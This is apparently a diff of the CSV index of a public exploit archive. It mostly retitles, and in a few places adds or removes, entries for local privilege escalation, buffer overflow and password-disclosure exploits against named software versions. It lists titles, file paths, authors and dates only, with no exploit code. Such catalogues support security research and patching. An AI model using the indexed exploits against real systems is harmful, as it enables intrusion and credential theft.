+758,platforms/osx/local/758.c,"Apple iTunes - Playlist Parsing Local Buffer Overflow",2005-01-16,nemo,osx,local,0 760,platforms/windows/local/760.cpp,"Peer2Mail 1.4 - Encrypted Password Dumper",2005-01-16,ATmaCA,windows,local,0 763,platforms/linux/local/763.c,"fkey 0.0.2 - Local File Accessibility",2005-01-20,vade79,linux,local,79 766,platforms/osx/local/766.c,"Apple Mac OSX 10.3.7 - 'mRouter' Privilege Escalation",2005-01-22,nemo,osx,local,0 @@ -5908,15 +5925,15 @@ id,file,description,date,author,platform,type,port 778,platforms/linux/local/778.c,"Linux Kernel 2.4 - 'uselib()' Privilege Escalation (2)",2005-01-27,"Tim Hsu",linux,local,0 779,platforms/linux/local/779.sh,"ncpfs < 2.2.6 (Gentoo / Linux) - Privilege Escalation",2005-01-30,super,linux,local,0 788,platforms/linux/local/788.pl,"Operator Shell (osh) 1.7-12 - Privilege Escalation",2005-02-05,"Charles Stevenson",linux,local,0 -791,platforms/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 +791,platforms/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",linux,local,0 792,platforms/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",linux,local,0 793,platforms/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,osx,local,0 795,platforms/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,osx,local,0 796,platforms/linux/local/796.sh,"Exim 4.42 - Privilege Escalation",2005-02-07,darkeagle,linux,local,0 798,platforms/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,windows,local,0 803,platforms/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,windows,local,0 -811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Local",2005-02-10,Kozan,windows,local,0 -816,platforms/linux/local/816.c,"GNU a2ps - 'Anything to PostScript' Not SUID Local",2005-02-13,lizard,linux,local,0 +811,platforms/windows/local/811.c,"DelphiTurk e-Posta 1.0 - Credential Recover",2005-02-10,Kozan,windows,local,0 +816,platforms/linux/local/816.c,"GNU a2ps - Anything to PostScript Not SUID Local Overflow",2005-02-13,lizard,linux,local,0 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Non SUID Local Shell",2005-09-13,Qnix,linux,local,0 833,platforms/windows/local/833.cpp,"PeerFTP 5 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 834,platforms/windows/local/834.c,"eXeem 0.21 - Local Password Disclosure",2005-02-22,Kozan,windows,local,0 @@ -5937,7 +5954,7 @@ id,file,description,date,author,platform,type,port 896,platforms/osx/local/896.c,"Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Buffer Overflow Privilege Escalation",2005-03-22,vade79,osx,local,0 898,platforms/aix/local/898.sh,"AIX 5.3.0 - 'invscout' Local Command Execution",2005-03-25,ri0t,aix,local,0 905,platforms/windows/local/905.c,"BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow",2005-04-01,class101,windows,local,0 -912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Local",2005-04-04,Kozan,windows,local,0 +912,platforms/windows/local/912.c,"GetDataBack Data Recovery 2.31 - Licence Recover",2005-04-04,Kozan,windows,local,0 913,platforms/linux/local/913.pl,"Aeon 0.2a - Local Linux (1)",2005-04-05,lammat,linux,local,0 914,platforms/linux/local/914.c,"Aeon 0.2a - Local Linux (2)",2005-04-05,patr0n,linux,local,0 918,platforms/windows/local/918.c,"FTP Now 2.6.14 - Local Password Disclosure",2005-04-06,Kozan,windows,local,0 @@ -5965,7 +5982,7 @@ id,file,description,date,author,platform,type,port 974,platforms/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",linux,local,0 997,platforms/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Privilege Escalation",2005-05-17,newbug,linux,local,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,aix,local,0 -1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local",2005-05-25,Plugger,linux,local,0 +1009,platforms/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,linux,local,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 1029,platforms/linux/local/1029.c,"ePSXe 1.6.0 - 'nogui()' Privilege Escalation",2005-06-04,Qnix,linux,local,0 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0 @@ -5976,7 +5993,7 @@ id,file,description,date,author,platform,type,port 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0 1073,platforms/solaris/local/1073.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 1074,platforms/solaris/local/1074.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0 -1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure Local",2005-07-04,Kozan,windows,local,0 +1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure",2005-07-04,Kozan,windows,local,0 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0 1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local,0 @@ -6008,7 +6025,7 @@ id,file,description,date,author,platform,type,port 1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure",2005-11-09,kingcope,bsd,local,0 1316,platforms/linux/local/1316.pl,"Veritas Storage Foundation 4.0 - VCSI18N_LANG Local Overflow",2005-11-12,"Kevin Finisterre",linux,local,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (x86) - 'phgrafx' Local Buffer Overflow",2005-11-30,"p. minervini",qnx,local,0 -1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local",2005-12-07,c0ntex,solaris,local,0 +1360,platforms/solaris/local/1360.c,"Appfluent Database IDS < 2.1.0.103 - Environment Variable Local Overflow",2005-12-07,c0ntex,solaris,local,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow Privilege Escalation",2005-12-30,alert7,linux,local,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - 'termsh' Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - 'Filename' Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 @@ -6083,7 +6100,7 @@ id,file,description,date,author,platform,type,port 2242,platforms/solaris/local/2242.sh,"Solaris 8/9 - '/usr/ucb/ps' Local Information Leak",2006-08-22,"Marco Ivaldi",solaris,local,0 2264,platforms/windows/local/2264.html,"VMware 5.5.1 - 'ActiveX' Local Buffer Overflow",2006-08-27,c0ntex,windows,local,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - '.ZIP' File Handling Local Buffer Overflow",2006-08-30,bratax,windows,local,0 -2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor Local",2006-09-01,"Andres Tarasco",windows,local,0 +2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 - Password Extractor",2006-09-01,"Andres Tarasco",windows,local,0 2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.38950 - 'Filename Handling' Buffer Overflow",2006-09-01,bratax,windows,local,0 2330,platforms/solaris/local/2330.c,"X11R6 < 6.4 XKEYBOARD (Solaris/SPARC) - Local Buffer Overflow (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 < 6.4 XKEYBOARD (solaris x86) - Local Buffer Overflow",2006-09-08,"RISE Security",solaris,local,0 @@ -6106,12 +6123,13 @@ id,file,description,date,author,platform,type,port 2635,platforms/hp-ux/local/2635.c,"HP-UX 11i - 'swask' Format String Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2636,platforms/hp-ux/local/2636.c,"HP-UX 11i - 'LIBC TZ' Enviroment Variable Privilege Escalation",2006-10-24,prdelka,hp-ux,local,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - 'Constructor' Arbitrary File Creation Privilege Escalation (3)",2006-10-24,"Marco Ivaldi",solaris,local,0 -2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local",2006-10-29,Nanika,windows,local,0 +2676,platforms/windows/local/2676.cpp,"Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation",2006-10-29,Nanika,windows,local,0 2737,platforms/osx/local/2737.pl,"Xcode OpenBase 10.0.0 (OSX) - Symlink Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2738,platforms/osx/local/2738.pl,"Xcode OpenBase 10.0.0 (OSX) - Unsafe System Call Privilege Escalation",2006-11-08,"Kevin Finisterre",osx,local,0 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (OSX) - 'libucache.dylib' Privilege Escalation",2006-11-15,"Kevin Finisterre",osx,local,0 40380,platforms/win_x86-64/local/40380.py,"PrivateTunnel Client 2.7.0 (x64) - Local Credentials Disclosure",2016-09-14,"Yakir Wizman",win_x86-64,local,0 2815,platforms/windows/local/2815.c,"XMPlay 3.3.0.4 - '.M3U' Filename Local Buffer Overflow",2006-11-20,"Greg Linares",windows,local,0 +2821,platforms/windows/local/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 2824,platforms/windows/local/2824.c,"XMPlay 3.3.0.4 - '.ASX' Filename Local Buffer Overflow",2006-11-21,"Greg Linares",windows,local,0 2872,platforms/windows/local/2872.c,"VUPlayer 2.44 - '.m3u' UNC Name Buffer Overflow",2006-11-30,Expanders,windows,local,0 2873,platforms/windows/local/2873.c,"AtomixMP3 < 2.3 - '.m3u' Buffer Overflow",2006-11-30,"Greg Linares",windows,local,0 @@ -6146,8 +6164,8 @@ id,file,description,date,author,platform,type,port 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0 3369,platforms/windows/local/3369.pl,"News Rover 12.1 Rev 1 - Remote Stack Overflow (2)",2007-02-24,"Umesh Wanve",windows,local,0 -3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Local",2007-02-28,"Don Bailey",plan9,local,0 -3384,platforms/linux/local/3384.c,"Apache 1.3.33/1.3.34 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 +3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - 'devenv.c OTRUNC/pwrite' Privilege Escalation",2007-02-28,"Don Bailey",plan9,local,0 +3384,platforms/linux/local/3384.c,"Apache 1.3.34/1.3.33 (Ubuntu / Debian) - CGI TTY Privilege Escalation",2007-02-28,"Kristian Hermansen",linux,local,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) 7.7 - Privilege Escalation",2007-02-28,"Kevin Finisterre",osx,local,0 3413,platforms/multiple/local/3413.php,"PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 3414,platforms/multiple/local/3414.php,"PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak",2007-03-04,"Stefan Esser",multiple,local,0 @@ -6165,12 +6183,12 @@ id,file,description,date,author,platform,type,port 3479,platforms/linux/local/3479.php,"PHP 5.2.1 - 'session_regenerate_id()' Double-Free",2007-03-14,"Stefan Esser",linux,local,0 3480,platforms/linux/local/3480.php,"PHP 5.2.0/5.2.1 - Rejected Session ID Double-Free",2007-03-14,"Stefan Esser",linux,local,0 3488,platforms/windows/local/3488.php,"PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow",2007-03-15,rgod,windows,local,0 -3499,platforms/linux/local/3499.php,"PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local",2007-03-16,"Stefan Esser",linux,local,0 +3499,platforms/linux/local/3499.php,"PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Overflow",2007-03-16,"Stefan Esser",linux,local,0 3517,platforms/osx/local/3517.php,"PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow",2007-03-19,"Stefan Esser",osx,local,0 3525,platforms/linux/local/3525.php,"PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage",2007-03-20,"Stefan Esser",linux,local,0 3529,platforms/linux/local/3529.php,"PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage",2007-03-20,"Stefan Esser",linux,local,0 3559,platforms/multiple/local/3559.php,"PHP 5.2.1 - 'Unserialize()' Local Information Leak",2007-03-23,"Stefan Esser",multiple,local,0 -3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local",2007-03-25,"Stefan Esser",linux,local,0 +3571,platforms/linux/local/3571.php,"PHP < 4.4.5/5.2.1 - '_SESSION unset()' Local Overflow",2007-03-25,"Stefan Esser",linux,local,0 3572,platforms/linux/local/3572.php,"PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite",2007-03-25,"Stefan Esser",linux,local,0 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL PHPDOC - Local Buffer Overflow",2007-03-25,rgod,windows,local,0 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation",2007-03-26,harry,bsd,local,0 @@ -6181,7 +6199,7 @@ id,file,description,date,author,platform,type,port 3647,platforms/windows/local/3647.c,"Microsoft Windows - Animated Cursor '.ani' Local Buffer Overflow",2007-04-02,Marsu,windows,local,0 3648,platforms/windows/local/3648.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (1)",2007-04-02,Marsu,windows,local,0 3649,platforms/windows/local/3649.c,"Ipswitch WS_FTP 5.05 - Server Manager Local Site Buffer Overflow",2007-04-02,Marsu,windows,local,0 -3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0 +3652,platforms/windows/local/3652.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow (Hardware DEP)",2007-04-03,devcode,windows,local,0 3664,platforms/windows/local/3664.txt,"TrueCrypt 4.3 - 'setuid' Privilege Escalation",2007-04-04,"Marco Ivaldi",windows,local,0 3688,platforms/windows/local/3688.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (1)",2007-04-08,Ivanlef0u,windows,local,0 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0 @@ -6269,8 +6287,8 @@ id,file,description,date,author,platform,type,port 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 -4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 -4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' PLSQL Injection 'get users hash'",2008-01-28,sh2kerr,multiple,local,0 +4994,platforms/multiple/local/4994.sql,"Oracle 10g R1 - 'pitrig_drop' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,multiple,local,0 +4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - 'PITRIG_TRUNCATE' Get Users Hash / PL/SQL Injection",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password)",2008-01-28,sh2kerr,multiple,local,0 4998,platforms/windows/local/4998.c,"IrfanView 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 5004,platforms/windows/local/5004.c,"SafeNet 10.4.0.12 - 'IPSecDrv.sys' Local kernel Ring0 SYSTEM",2008-01-29,mu-b,windows,local,0 @@ -6363,7 +6381,7 @@ id,file,description,date,author,platform,type,port 7675,platforms/multiple/local/7675.txt,"Oracle 10g - SYS.LT.REMOVEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7676,platforms/multiple/local/7676.txt,"Oracle 10g - SYS.LT.MERGEWORKSPACE SQL Injection",2009-01-06,sh2kerr,multiple,local,0 7677,platforms/multiple/local/7677.txt,"Oracle 10g - 'SYS.LT.COMPRESSWORKSPACETREE' SQL Injection (1)",2009-01-06,sh2kerr,multiple,local,0 -7681,platforms/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments'",2009-01-06,"Paul Szabo",linux,local,0 +7681,platforms/linux/local/7681.txt,"Debian XTERM - 'DECRQSS/comments' Code Execution",2009-01-06,"Paul Szabo",linux,local,0 7684,platforms/windows/local/7684.pl,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-01-06,Encrypt3d.M!nd,windows,local,0 7688,platforms/windows/local/7688.pl,"Cain & Abel 4.9.25 - 'Cisco IOS-MD5' Local Buffer Overflow",2009-01-07,send9,windows,local,0 7692,platforms/windows/local/7692.pl,"CoolPlayer 2.19 - 'PlaylistSkin' Buffer Overflow",2009-01-07,"Jeremy Brown",windows,local,0 @@ -6389,7 +6407,7 @@ id,file,description,date,author,platform,type,port 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow",2009-02-03,h4ck3r#47,windows,local,0 7973,platforms/windows/local/7973.pl,"Euphonics Audio Player 1.0 - '.pls' Universal Local Buffer Overflow",2009-02-04,Houssamix,windows,local,0 7974,platforms/windows/local/7974.c,"Euphonics Audio Player 1.0 (Windows XP SP3) - '.pls' Local Buffer Overflow",2009-02-04,"Single Eye",windows,local,0 -7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Remote Overflow",2009-02-04,LiquidWorm,windows,local,0 +7975,platforms/windows/local/7975.py,"BlazeVideo HDTV Player 3.5 - '.PLF' Playlist File Local Overflow",2009-02-04,LiquidWorm,windows,local,0 7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0 8010,platforms/windows/local/8010.pl,"feedDemon 2.7 - OPML Outline Tag Buffer Overflow",2009-02-09,cenjan,windows,local,0 8055,platforms/freebsd/local/8055.txt,"FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation",2009-02-16,kingcope,freebsd,local,0 @@ -6586,7 +6604,7 @@ id,file,description,date,author,platform,type,port 9509,platforms/windows/local/9509.pl,"Media Jukebox 8 - '.m3u' Universal Local Buffer (SEH)",2009-08-25,hack4love,windows,local,0 9513,platforms/linux/local/9513.c,"Linux Kernel 2.6.31-rc7 - 'AF_LLC getsockname' 5-Byte Stack Disclosure (PoC)",2009-08-25,"Jon Oberheide",linux,local,0 9519,platforms/windows/local/9519.pl,"ProShow Producer / Gold 4.0.2549 - '.psh' Universal Buffer Overflow (SEH)",2009-08-25,hack4love,windows,local,0 -9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Local",2009-08-25,"Xia Shing Zee",multiple,local,0 +9520,platforms/multiple/local/9520.txt,"HyperVM - File Permissions Credential Disclosure",2009-08-25,"Xia Shing Zee",multiple,local,0 9521,platforms/linux/local/9521.c,"Linux Kernel 2.6.30 - 'atalk_getname()' 8-bytes Stack Disclosure (1)",2009-08-26,"Clément Lecigne",linux,local,0 9536,platforms/windows/local/9536.py,"PIPL 2.5.0 - '.m3u' Universal Buffer Overflow (SEH)",2009-08-28,mr_me,windows,local,0 9540,platforms/windows/local/9540.py,"HTML Creator & Sender 2.3 build 697 - Local Buffer Overflow (SEH)",2009-08-28,Dr_IDE,windows,local,0 @@ -6644,7 +6662,7 @@ id,file,description,date,author,platform,type,port 9985,platforms/multiple/local/9985.txt,"Xpdf 3.01 - heap Overflow / Null Pointer Dereference",2009-10-17,"Adam Zabrocki",multiple,local,0 14273,platforms/linux/local/14273.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 9988,platforms/windows/local/9988.txt,"Adobe Photoshop Elements - Active File Monitor Service Privilege Escalation",2009-10-29,bellick,windows,local,0 -9990,platforms/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Remote",2009-11-09,"Felipe Andres Manzano",multiple,local,0 +9990,platforms/multiple/local/9990.txt,"Adobe Reader / Acrobat - '.U3D' File Invalid Array Index Overflow",2009-11-09,"Felipe Andres Manzano",multiple,local,0 9991,platforms/windows/local/9991.txt,"Alleycode 2.21 - Overflow (SEH) (PoC)",2009-10-05,"Rafael Sousa",windows,local,0 10009,platforms/windows/local/10009.txt,"Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 @@ -6728,7 +6746,7 @@ id,file,description,date,author,platform,type,port 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0 10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Overflow (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0 -10920,platforms/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Overflow",2010-01-02,"fl0 fl0w",windows,local,0 +10920,platforms/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",windows,local,0 10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0 @@ -6802,8 +6820,9 @@ id,file,description,date,author,platform,type,port 11958,platforms/windows/local/11958.py,"ASX to MP3 Converter 3.0.0.100 - Local Stack Overflow",2010-03-30,"Hazem mofeed",windows,local,0 11976,platforms/windows/local/11976.php,"Free MP3 CD Ripper 2.6 - '.wav' Stack Buffer Overflow",2010-03-31,mr_me,windows,local,0 11981,platforms/windows/local/11981.py,"WM Downloader 3.0.0.9 - '.asx' Local Buffer Overflow",2010-03-31,b0telh0,windows,local,0 +11987,platforms/windows/local/11987.txt,"Adobe Reader - Escape From '.PDF' Execute Embedded Executable",2010-03-31,"Didier Stevens",windows,local,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 -12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav'",2010-04-02,"Richard leahy",windows,local,0 +12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Local Overflow",2010-04-02,"Richard leahy",windows,local,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Overflow (SEH)",2010-04-03,"Lincoln & corelanc0d3r",windows,local,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 @@ -6870,7 +6889,7 @@ id,file,description,date,author,platform,type,port 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 - ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 -14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Local",2010-07-07,chap0,windows,local,0 +14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Direct RET Overflow",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0 @@ -6889,7 +6908,7 @@ id,file,description,date,author,platform,type,port 14527,platforms/windows/local/14527.pl,"WM Downloader 3.1.2.2 - Buffer Overflow (1)",2010-08-02,s-dz,windows,local,0 14532,platforms/windows/local/14532.py,"Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Cnvrtr - Stack Buffer Overflow",2010-08-02,"Praveen Darshanam",windows,local,0 14538,platforms/ios/local/14538.txt,"Apple iOS - '.pdf' Jailbreak",2010-08-03,jailbreakme,ios,local,0 -14550,platforms/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram'",2010-08-04,"Oh Yaw Theng",windows,local,0 +14550,platforms/windows/local/14550.py,"Easy RM to MP3 2.7.3.700 - '.m3u' / '.pls' / '.smi' / '.wpl' / '.wax' / '.wvx' / '.ram' Local Overflow",2010-08-04,"Oh Yaw Theng",windows,local,0 14566,platforms/windows/local/14566.c,"Microsoft Windows - 'win32k.sys' Driver 'CreateDIBPalette()' Buffer Overflow",2010-08-06,Arkon,windows,local,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow",2010-08-08,"Oh Yaw Theng",windows,local,0 @@ -6992,7 +7011,6 @@ id,file,description,date,author,platform,type,port 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0 -15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local",2010-10-13,prdelka,solaris,local,0 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0 @@ -7026,7 +7044,7 @@ id,file,description,date,author,platform,type,port 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow (SEH)",2010-11-29,0v3r,windows,local,0 15663,platforms/windows/local/15663.py,"Mediacoder 0.7.5.4797 - '.m3u' Buffer Overflow (SEH)",2010-12-02,"Oh Yaw Theng",windows,local,0 15692,platforms/windows/local/15692.py,"Video Charge Studio 2.9.5.643 - '.vsc' Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 -15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 